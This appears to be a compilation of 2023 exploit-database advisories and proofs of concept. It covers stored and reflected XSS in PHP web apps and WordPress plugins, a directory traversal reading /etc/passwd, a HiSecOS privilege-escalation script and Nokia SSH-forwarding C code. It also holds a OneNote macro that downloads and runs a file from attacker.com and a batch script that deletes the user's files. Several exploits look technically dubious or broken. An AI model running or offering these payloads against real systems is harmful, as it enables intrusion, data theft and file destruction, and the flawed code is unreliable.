<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/33819/ │<br />│ Vendor : Rfcoding │<br />│ Software : Hospital Management System 1.0 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br /><br />POST /home/appointment/create HTTP/2<br /><br />-----------------------------262834650130522416703979271446<br />Content-Disposition: form-data; name="name"<br /><br />[XSS Payload]<br />-----------------------------262834650130522416703979271446<br />Content-Disposition: form-data; name="phone"<br /><br />[XSS Payload]<br />-----------------------------262834650130522416703979271446<br /><br /><br />## Steps to Reproduce:<br /><br />1. Visit Website (as Guest) and Click on [Appointment] on this Path (https://website/home/appointment)<br />2. Inject [XSS Payload] in Name<br />3. Inject [XSS Payload] in Phone<br />4. Fill Anything in the Other Fields<br />5. Press Submit<br /><br />6. When the ADMIN visit the [Patient] to check [Appointment Scheduling] on this Path (https://website/admin/patient)<br />7. XSS Will Fire and Executed on his Browser <br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing Vulnerability<br />## Author: nu11secur1ty<br />## Date: 06.22.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app<br />## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected<br /><br />## Description:<br />Microsoft OneNote is vulnerable to spoofing attacks. The malicious<br />user can trick the victim into clicking on a very maliciously crafted<br />URL or download some other malicious file and execute it. When this<br />happens the game will be over for the victim and his computer will be<br />compromised.<br />Exploiting the vulnerability requires that a user open a specially<br />crafted file with an affected version of Microsoft OneNote and then<br />click on a specially crafted URL to be compromised by the attacker.<br /><br />STATUS: 6.5 MEDIUM Vulnerability<br /><br />[+]Exploit:<br />```vbs<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",<br />vbNormalFocus)<br />End Sub<br /><br />```<br />[+]Inside-exploit<br />```<br />@echo off<br />del /s /q C:%HOMEPATH%\IMPORTANT\*<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)<br /><br />## Time spend:<br />01:15:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: HiSecOS 04.0.01 - Privilege Escalation<br /># Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation<br /># Date: 21.06.2023<br /># Exploit Author: dreizehnutters<br /># Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016<br /># Version: HiSecOS-04.0.01 or lower<br /># Tested on: HiSecOS-04.0.01<br /># CVE: BSECV-2021-07<br /><br />#!/bin/bash<br /><br />if [[ $# -lt 3 ]]; then<br /> echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"<br /> exit 1<br />fi<br /><br />target="$1"<br />user="$2"<br />pass="$3"<br /><br /># Craft basic header<br />auth=$(echo -ne "$user:$pass" | base64)<br /><br /># Convert to ASCII hex<br />blob=$(printf "$user" | xxd -ps -c 1)<br /><br /># Generate XML payload ('15' -> admin role)<br />gen_payload() {<br /> cat <<EOF<br /><rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20"><br /> <mibOperation xmlns="urn:x-mops:1.0"><br /> <edit-config><br /> <MIBData><br /> <MIB name="HM2-USERMGMT-MIB"><br /> <Node name="hm2UserConfigEntry"><br /> <Index><br /> <Attribute name="hm2UserName">$blob</Attribute><br /> </Index><br /> <Set name="hm2UserAccessRole">15</Set><br /> </Node><br /> </MIB><br /> </MIBData><br /> </edit-config><br /> </mibOperation><br /></rpc><br />EOF<br />}<br /><br />curl -i -s -k -X POST \<br /> -H "content-type: application/xml" \<br /> -H "authorization: Basic ${auth}" \<br /> --data-binary "$(gen_payload)" \<br /> "https://${target}/mops_data"<br /><br />echo "[*] $user is now an admin"<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.netartmedia.net/online-school/ │<br />│ Vendor : NetArt Media │<br />│ Software : PHP Online School 1.0 │<br />│ Vuln Type: Reflected XSS - Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Reflected XSS │<br />│ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />│ │<br />│ Stored XSS │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/users/index.php?category=home&action=welcome&category=home&action=welcome&order=date&order_type=desc&e9m9f"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"fgok8=1<br /><br /><br />## Stored XSS<br /><br /><br />POST /online-school/users/index.php HTTP/2<br /><br />-----------------------------124654322118707720774051212206<br />Content-Disposition: form-data; name="title"<br /><br />Any Title<br />-----------------------------124654322118707720774051212206<br />Content-Disposition: form-data; name="post_message"<br /><br /><br />-----------------------------124654322118707720774051212206<br />Content-Disposition: form-data; name="message"<br /><br />[XSS Payload]<br />-----------------------------124654322118707720774051212206<br /><br /><br />## Steps to Reproduce:<br /><br />1. Signup & Login in any Normal User Mode<br />2. Go to [My Question] Click [Ask a New Question] on this Path (https://website/users/index.php?category=tickets&action=new)<br />3. Select Any Subject<br />4. Write any Title<br />5. Inject your [XSS Payload] in "Message Box"<br />6. Select Any Priority<br />7. Press Submit<br /><br />8. When ADMIN check Student Questions on this Path (https://website/admin/index.php?category=tickets&action=new)<br />9. XSS Will Fire and Executed on his Browser <br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.netartmedia.net/mall/ │<br />│ Vendor : NetArt Media │<br />│ Software : PHP Mall 5.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/index.php?proceed_search=1&mod=products&lang=en&search_by=&proceed_search=1&mod=products&lang=en&search_by=&num=2&iv3s6"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b6yhe=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure<br />// Date: 2023-06-20<br />// Exploit Author: Amirhossein Bahramizadeh<br />// Category : Hardware<br />// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/<br />// Version: 7.13.52 (REQUIRED)<br />// Tested on: Windows/Linux<br />// CVE : CVE-2023-25187<br /><br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include <errno.h><br />#include <unistd.h><br />#include <netinet/in.h><br />#include <arpa/inet.h><br />#include <sys/socket.h><br />#include <sys/types.h><br />#include <sys/wait.h><br />#include <signal.h><br /><br />// The IP address of the vulnerable device<br />char *host = "192.168.1.1";<br /><br />// The default SSH port number<br />int port = 22;<br /><br />// The username and password for the BTS service user account<br />char *username = "service_user";<br />char *password = "password123";<br /><br />// The IP address of the attacker's machine<br />char *attacker_ip = "10.0.0.1";<br /><br />// The port number to use for the MITM attack<br />int attacker_port = 2222;<br /><br />// The maximum length of a message<br />#define MAX_LEN 1024<br /><br />// Forward data between two sockets<br />void forward_data(int sock1, int sock2)<br />{<br /> char buffer[MAX_LEN];<br /> ssize_t bytes_read;<br /><br /> while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)<br /> {<br /> write(sock2, buffer, bytes_read);<br /> }<br />}<br /><br />int main()<br />{<br /> int sock, pid1, pid2;<br /> struct sockaddr_in addr;<br /> char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};<br /><br /> // Create a new socket<br /> sock = socket(AF_INET, SOCK_STREAM, 0);<br /><br /> // Set the address to connect to<br /> memset(&addr, 0, sizeof(addr));<br /> addr.sin_family = AF_INET;<br /> addr.sin_port = htons(port);<br /> inet_pton(AF_INET, host, &addr.sin_addr);<br /><br /> // Connect to the vulnerable device<br /> if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)<br /> {<br /> fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));<br /> exit(1);<br /> }<br /><br /> // Send the SSH handshake<br /> write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);<br /> read(sock, NULL, 0);<br /><br /> // Send the username<br /> write(sock, username, strlen(username));<br /> write(sock, "\r\n", 2);<br /> read(sock, NULL, 0);<br /><br /> // Send the password<br /> write(sock, password, strlen(password));<br /> write(sock, "\r\n", 2);<br /><br /> // Wait for the authentication to complete<br /> sleep(1);<br /><br /> // Start an SSH client on the attacker's machine<br /> pid1 = fork();<br /> if (pid1 == 0)<br /> {<br /> execv("/usr/bin/ssh", argv);<br /> exit(0);<br /> }<br /><br /> // Start an SSH server on the attacker's machine<br /> pid2 = fork();<br /> if (pid2 == 0)<br /> {<br /> execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);<br /> exit(0);<br /> }<br /><br /> // Wait for the SSH server to start<br /> sleep(1);<br /><br /> // Forward data between the client and the server<br /> pid1 = fork();<br /> if (pid1 == 0)<br /> {<br /> forward_data(sock, STDIN_FILENO);<br /> exit(0);<br /> }<br /> pid2 = fork();<br /> if (pid2 == 0)<br /> {<br /> forward_data(STDOUT_FILENO, sock);<br /> exit(0);<br /> }<br /><br /> // Wait for the child processes to finish<br /> waitpid(pid1, NULL, 0);<br /> waitpid(pid2, NULL, 0);<br /><br /> // Close the socket<br /> close(sock);<br /><br /> return 0;<br />}<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Super Socializer 7.13.52 - Reflected XSS<br /># Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com<br /># Date: 2023-06-20<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : Webapps<br /># Vendor Homepage: https://wordpress.org/plugins/super-socializer<br /># Version: 7.13.52 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-2779<br />import requests<br /><br /># The URL of the vulnerable AJAX endpoint<br />url = "https://example.com/wp-admin/admin-ajax.php"<br /><br /># The vulnerable parameter that is not properly sanitized and escaped<br />vulnerable_param = "<img src=x onerror=alert(document.domain)>"<br /><br /># The payload that exploits the vulnerability<br />payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}<br /><br /># Send a POST request to the vulnerable endpoint with the payload<br />response = requests.post(url, data=payload)<br /><br /># Check if the payload was executed by searching for the injected script tag<br />if "<img src=x onerror=alert(document.domain)>" in response.text:<br /> print("Vulnerability successfully exploited")<br />else:<br /> print("Vulnerability not exploitable")<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Accent Microcomputers CMS v 2.4 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Telegram : @indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.accent.com.pl | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : ../../../../../../../../../etc/passwd<br /><br />http://127.0.0.1/www/mmrtradingpl/index.php?id=50&file=../../../../../../../../../etc/passwd<br /><br />http://127.0.0.1/www/transcomfortpl/index.php?id=50&file=../../../../../../../../../etc/passwd<br /><br />=====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />============================================================================================================================================</code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.netartmedia.net/autodealer/ │<br />│ Vendor : NetArt Media │<br />│ Software : PHP Car Dealer 3.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)<br /># Dork: inurl:~/admin/views/admin.php<br /># Date: 2023-06-20<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : Webapps<br /># Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social<br /># Version: 1.0.1 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-3320<br /><br />import requests<br />import hashlib<br />import time<br /><br /># Set the target URL<br />url = "http://example.com/wp-admin/admin.php?page=wpss_settings"<br /><br /># Set the user agent string<br />user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"<br /><br /># Generate the nonce value<br />nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()<br /><br /># Set the data payload<br />payload = {<br /> "wpss_nonce": nonce,<br /> "wpss_setting_1": "value_1",<br /> "wpss_setting_2": "value_2",<br /> # Add additional settings as needed<br />}<br /><br /># Set the request headers<br />headers = {<br /> "User-Agent": user_agent,<br /> "Referer": url,<br /> "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",<br /> # Add additional headers as needed<br />}<br /><br /># Send the POST request<br />response = requests.post(url, data=payload, headers=headers)<br /><br /># Check the response status code<br />if response.status_code == 200:<br /> print("Request successful")<br />else:<br /> print("Request failed")<br /> <br /><br /></code></pre>